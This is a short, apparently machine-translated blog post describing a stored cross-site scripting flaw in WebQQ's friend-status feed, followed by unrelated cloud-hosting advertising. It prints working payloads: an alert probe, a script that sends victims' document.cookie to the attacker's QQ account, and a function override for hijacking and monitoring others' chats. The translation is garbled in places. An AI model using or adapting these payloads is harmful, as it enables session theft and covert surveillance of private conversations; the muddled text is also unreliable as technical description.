Msbobo.cn
Not long ago, I found that some of the content in the friend log will be displayed in the newest yellow diamond navigation of "friend status". At that time, I thought that if I didn't filter out the content, I could use xss to send a content in the log (webqq official website src = # onerror = alert (/xxx /)) the log recorded by another chinaren hacker in webqq successfully popped up the box. Now, you can directly write the code of hero island official information in the log to execute the code on webqq. At that time, you wanted to write an infected when something comes out, as long as someone else logs on to webqq (the webqq login will automatically obtain the space log, after logging on to the webqq official website, the webqq website will also be scheduled. At that time, a test was conducted to allow others to log on to the website. After that, the dashboard will automatically send an icon message, and then write the code (scriptwebqq) in the log. obj. qqclient. sendc2cmsg (12345678, x, 'test')/script) code is the function that executes webqq to send messages. 12345678 is the QQ number for receiving messages, x is a value of 0 (the specific Wuhan region does not go to the analysis and is set to 0) Text indicates the message content. The test result is obvious. When logging on to webqq, the system executes the function and sends the message and changes the code to scriptwebqq. obj. qqclient. sendc2cmsg (12345678, x, document. cookie)/Replace the script number with your own number. As long as you log on to webqq, you will send your cookie to your friend jk7ose for testing!
Later, I wanted a chat hijacking and changed the code:
Script
Var _ asdf = webqq. obj. qqclient. sendc2cmsg;
Webqq. obj. qqclient. sendc2cmsg = function (a, B, c ){
Alert ();
_ Asdf (a, B, c );
}
/Script
Alert () this shows that messages to be sent to the qq account can be obtained for evil purposes if they are changed to evil code. For example, messages sent to others are intercepted by sending the chat content to my qq and then to the target qq, if you change the code to hijack the message receiving function, you can "Monitor" others to chat!
In fact, this xss can not only implement this, but also implement automatic reply to chat robots in a group.
Haha, this is basically the case. Unfortunately, there are still a lot of ideas to be implemented after the vulnerability is supplemented ......
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
